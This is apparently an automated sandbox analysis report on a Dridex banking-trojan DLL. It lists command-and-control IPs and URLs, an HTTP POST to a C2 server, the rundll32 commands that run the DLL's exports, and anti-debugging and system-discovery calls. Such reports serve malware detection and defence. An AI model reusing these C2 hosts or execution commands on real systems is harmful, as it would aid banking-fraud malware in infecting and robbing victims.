                      Source: rundll32.exe, 00000007.00000003.565788704.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/814
                      Source: loaddll32.exe, 00000002.00000003.599359620.0000000000FCA000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/=-
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/D
                      Source: rundll32.exe, 00000007.00000003.454521385.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ES
                      Source: rundll32.exe, 00000007.00000003.734581021.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/F
                      Source: rundll32.exe, 00000007.00000003.632573369.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/M
                      Source: loaddll32.exe, 00000002.00000002.814006156.0000000000F58000.00000004.00000020.sdmpString found in binary or memory: https://185.56.219.47:8116/Ps%
                      Source: rundll32.exe, 00000007.00000003.590697653.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/fW
                      Source: rundll32.exe, 00000007.00000003.693220636.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/j
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/l
                      Source: loaddll32.exe, 00000002.00000003.538347137.0000000000F57000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ll
                      Source: rundll32.exe, 00000007.00000003.746859571.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/llo
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/y$7
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.438132004.0000000003361000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.734581021.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: rundll32.exe, 00000007.00000003.734581021.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/(r
                      Source: rundll32.exe, 00000007.00000003.454521385.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/-
                      Source: rundll32.exe, 00000007.00000003.496322195.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/.Q
                      Source: rundll32.exe, 00000007.00000003.734581021.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/0
                      Source: loaddll32.exe, 00000002.00000003.451141108.0000000000F57000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/3
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/5
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/563209-4053062332-1002
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/563209-4053062332-1002L
                      Source: rundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/563209-4053062332-1002y
                      Source: rundll32.exe, 00000007.00000003.479578980.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/6Q
                      Source: loaddll32.exe, 00000002.00000002.814100062.0000000000F98000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Aq
                      Source: loaddll32.exe, 00000002.00000003.451141108.0000000000F57000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/B
                      Source: rundll32.exe, 00000007.00000003.438132004.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/BQ
                      Source: loaddll32.exe, 00000002.00000002.814100062.0000000000F98000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: rundll32.exe, 00000007.00000003.624273197.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/FQ
                      Source: rundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/GlobalSign
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Im
                      Source: rundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Is
                      Source: loaddll32.exe, 00000002.00000003.507704635.0000000000F59000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.815150304.00000000032FA000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/K
                      Source: loaddll32.exe, 00000002.00000002.814100062.0000000000F98000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/P6
                      Source: loaddll32.exe, 00000002.00000002.814100062.0000000000F98000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/S
                      Source: loaddll32.exe, 00000002.00000003.507704635.0000000000F59000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/T
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Vs
                      Source: rundll32.exe, 00000007.00000003.438132004.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/_s
                      Source: loaddll32.exe, 00000002.00000003.640878974.0000000000F55000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: rundll32.exe, 00000007.00000003.734581021.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/en-US
                      Source: rundll32.exe, 00000007.00000003.496358216.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.565824893.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/graphy
                      Source: rundll32.exe, 00000007.00000003.565788704.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/jQ
                      Source: rundll32.exe, 00000007.00000003.693267353.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/liuS
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/nQ
                      Source: rundll32.exe, 00000007.00000003.516053522.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.693267353.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: rundll32.exe, 00000007.00000003.615902947.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/rs
                      Source: loaddll32.exe, 00000002.00000003.591088945.0000000000F58000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/y
                      Source: rundll32.exe, 00000007.00000003.487949283.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/zQ
                      Source: rundll32.exe, 00000007.00000003.430153868.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://19dl.windowsupdate.com/
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmpString found in binary or memory: https://45.7-
                      Source: rundll32.exe, 00000007.00000003.471262416.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: rundll32.exe, 00000007.00000003.433791949.000000000339E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/-
                      Source: loaddll32.exe, 00000002.00000003.457412694.0000000000F57000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.615853148.0000000000F58000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.451150859.0000000000F60000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.746888787.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: rundll32.exe, 00000007.00000003.524364338.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
                      Source: rundll32.exe, 00000007.00000003.565824893.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/liuS
                      Source: loaddll32.exe, 00000002.00000003.434212982.0000000000F5A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/08/
                      Source: loaddll32.exe, 00000002.00000003.451150859.0000000000F60000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/08/l
                      Source: loaddll32.exe, 00000002.00000003.434212982.0000000000F5A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14
                      Source: rundll32.exe, 00000007.00000003.693220636.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14M
                      Source: loaddll32.exe, 00000002.00000003.640878974.0000000000F55000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/899f5f57b9a
                      Source: rundll32.exe, 00000007.00000003.438113449.00000000033D1000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/9
                      Source: rundll32.exe, 00000007.00000002.815937821.0000000005413000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.524364338.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.734607197.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.590739605.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000002.00000003.451150859.0000000000F60000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Q%
                      Source: rundll32.exe, 00000007.00000002.815937821.0000000005413000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Rf
                      Source: rundll32.exe, 00000007.00000003.524364338.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Vi
                      Source: loaddll32.exe, 00000002.00000003.434212982.0000000000F5A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/der
                      Source: rundll32.exe, 00000007.00000003.487977022.0000000005416000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.815937821.0000000005413000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.516053522.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000002.00000003.649139573.0000000000F55000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.815358842.00000000033D1000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/q
                      Source: loaddll32.exe, 00000002.00000003.484765322.0000000000F56000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.715289859.0000000000F54000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.433750522.0000000003361000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/r
                      Source: rundll32.exe, 00000007.00000002.815358842.00000000033D1000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/rY
                      Source: rundll32.exe, 00000007.00000003.565824893.0000000005416000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/ri
                      Source: loaddll32.exe, 00000002.00000003.591079359.0000000000F4C000.00000004.00000001.sdmpString found in binary or memory: https://452.46.210.220/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9639F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49743 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 9.3.rundll32.exe.46edb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.46edb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.8edb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.10edb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.7ddb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.7ddb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.10edb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.6e930000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e930000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.rundll32.exe.31bdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.rundll32.exe.31bdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.8edb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000003.411045678.00000000046D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.816097382.000000006E931000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.380770170.00000000007C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.815049595.000000006E931000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.400629828.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.413004072.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.381345345.00000000031A0000.00000040.00000001.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9351A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9467C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94AE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E948AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9526B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E951EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E936AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9496D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E95FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E953EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E948EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94B6F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9562F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94F6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E93CA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E95FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E950220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E95D620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E951240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E939E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E949E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94A660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E957660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E952E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E93B79B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E931784
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9483C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E947FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E957FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94E3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E959B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E953B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E951730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94BF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E945B60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E955CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94E0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E954CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9550A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E95DCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94A0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9498DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9488C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E948CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94D030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E951020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94C590
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94D980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E95D180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E93F9A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E94FDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9589F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9571F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E947564
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E97E210
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E9422A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E95BE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.dllReversingLabs: Detection: 38%
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/1@0/4
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.23455Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.9478.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000002.00000002.815295434.000000006E9F7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.816408400.000000006E9F7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.9478.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E943930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E95CEF8 FindFirstFileExW,
                      Source: rundll32.exe, 00000007.00000002.815256104.0000000003356000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWM
                      Source: loaddll32.exe, 00000002.00000002.813943136.0000000000F4C000.00000004.00000020.sdmp, rundll32.exe, 00000007.00000002.815256104.0000000003356000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000002.00000002.813943136.0000000000F4C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E9A97B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E9A8B60 __invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__aligned_msize,__invoke_watson_if_error,__cftoe,__aligned_msize,__invoke_watson_if_error,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__invoke_watson_if_error,__CrtDbgReportWV,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E9A47C0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EA7BA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EA7B64D push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6EA7B942 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E946C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E947A60 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E9763A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.9478.dll',#1
                      Source: loaddll32.exe, 00000002.00000002.814515137.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.815474501.0000000003780000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000002.00000002.814515137.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.815474501.0000000003780000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000002.00000002.814515137.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.815474501.0000000003780000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000002.00000002.814515137.0000000001820000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.815474501.0000000003780000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E942980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
